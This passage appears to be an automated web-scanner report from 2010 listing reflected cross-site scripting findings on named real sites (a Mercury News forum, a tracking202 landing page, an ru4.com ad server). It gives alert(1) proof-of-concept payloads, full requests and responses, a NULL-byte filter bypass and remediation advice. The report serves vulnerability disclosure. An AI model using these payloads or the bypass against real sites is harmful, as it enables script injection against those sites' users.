GET /forums/forum%006668f"-alert(1)-"f958950ecdc/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:23:52 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=297d55a81cf374e982219cba8d6b899a; expires=Fri, 31 Dec 2010 02:57:12 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:24:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21961
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007404b"-alert(1)-"cb08f69ef9b was submitted in the REST URL parameter 3. This input was echoed as 7404b"-alert(1)-"cb08f69ef9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%007404b"-alert(1)-"cb08f69ef9b HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:24:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=4590668b3373517d1e43091bd1b5ab3d; expires=Fri, 31 Dec 2010 02:57:30 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:24:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21961
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08f7"-alert(1)-"5560a98aa55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumse08f7"-alert(1)-"5560a98aa55/poll HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:23:16 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=3b738ddcb7ec5f357dbd9a144257d329; expires=Fri, 31 Dec 2010 02:56:36 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21993
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c9c0e"-alert(1)-"a62518d6b65 was submitted in the REST URL parameter 2. This input was echoed as c9c0e"-alert(1)-"a62518d6b65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00c9c0e"-alert(1)-"a62518d6b65 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:23:31 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=2d85e4ba2b8771b61f67c399df560935; expires=Fri, 31 Dec 2010 02:56:51 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21956
The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bc23'%3balert(1)//d59b1e8fa8c was submitted in the lpip parameter. This input was echoed as 5bc23';alert(1)//d59b1e8fa8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=71965bc23'%3balert(1)//d59b1e8fa8c HTTP/1.1
Host: gmtrx.com
Proxy-Connection: keep-alive
Referer: http://weekly-consumer-tips.com/?&t202id=bng&t202kw=news&c3=dp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:05:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Length: 3175
Connection: close
Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '71965bc23';alert(1)//d59b1e8fa8c'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2'); var ...[SNIP]...
4.34. http://gmtrx.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gmtrx.com
Path: /tracking202/static/landing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3479e'%3balert(1)//645efb88a9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3479e';alert(1)//645efb88a9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=/3479e'%3balert(1)//645efb88a9c7196 HTTP/1.1
Host: gmtrx.com
Proxy-Connection: keep-alive
Referer: http://weekly-consumer-tips.com/?&t202id=bng&t202kw=news&c3=dp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:05:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Length: 3176
Connection: close
Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '/3479e';alert(1)//645efb88a9c7196'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2');
The value of the VS_cookie request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 160fe"-alert(1)-"b4a8432313a was submitted in the VS_cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA160fe"-alert(1)-"b4a8432313a&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1
Host: http300.edge.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA"
Pragma: No-Cache
Cache-Control: private, no-cache="Set-Cookie"
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:04:47 GMT
Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C95"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA160fe"-alert(1)-"b4a8432313a&referrer=&searchterm="; /* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&in ...[SNIP]...
The value of the VS_cookie request parameter is copied into a JavaScript inline comment. The payload ccf2f*/alert(1)//13e87fd3ac was submitted in the VS_cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAAccf2f*/alert(1)//13e87fd3ac&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1
Host: http300.edge.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA"
Pragma: No-Cache
Cache-Control: private, no-cache="Set-Cookie"
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:04:47 GMT
Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... ne'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAAccf2f*/alert(1)//13e87fd3ac&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9 ...[SNIP]...
The value of the cg5 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e6e4"-alert(1)-"d85695b437b was submitted in the cg5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS1e6e4"-alert(1)-"d85695b437b&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1
Host: http300.edge.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA"
Pragma: No-Cache
Cache-Control: private, no-cache="Set-Cookie"
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:04:48 GMT
Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C94"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS1e6e4"-alert(1)-"d85695b437b&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http ...[SNIP]...
The value of the cg5 request parameter is copied into a JavaScript inline comment. The payload 1759e*/alert(1)//278eb7141d4 was submitted in the cg5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS1759e*/alert(1)//278eb7141d4&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1
Host: http300.edge.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA"
Pragma: No-Cache
Cache-Control: private, no-cache="Set-Cookie"
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:04:48 GMT
Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C91"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... img'); img2.width=1; img2.height=1; img2.style.display='none'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS1759e*/alert(1)//278eb7141d4&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicat ...[SNIP]...
The value of the customer_indicator request parameter is copied into a JavaScript inline comment. The payload 41c97*/alert(1)//d4d04b19740 was submitted in the customer_indicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N41c97*/alert(1)//d4d04b19740&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... Element('img'); img2.width=1; img2.height=1; img2.style.display='none'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N41c97*/alert(1)//d4d04b19740&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&custome ...[SNIP]...
The value of the customer_indicator request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0917"-alert(1)-"0105602e2ba was submitted in the customer_indicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=Nd0917"-alert(1)-"0105602e2ba&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:48 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C93"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=Nd0917"-alert(1)-"0105602e2ba&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='ht ...[SNIP]...
The value of the paidornatural request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c41"-alert(1)-"617f75f91bd was submitted in the paidornatural parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=f3c41"-alert(1)-"617f75f91bd&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp1 = "&paidornatural=f3c41"-alert(1)-"617f75f91bd&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm="; var xp1_qs = "&paidornatural=f3c41"-alert(1)-"617f75f91bd&testcell=&customer_i ...[SNIP]...
The value of the referrer request parameter is copied into a JavaScript inline comment. The payload fbd00*/alert(1)//48573649511 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=fbd00*/alert(1)//48573649511&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=fbd00*/alert(1)//48573649511&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625E ...[SNIP]...
The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd01c"-alert(1)-"a4de3bd6ee was submitted in the referrer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=cd01c"-alert(1)-"a4de3bd6ee&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
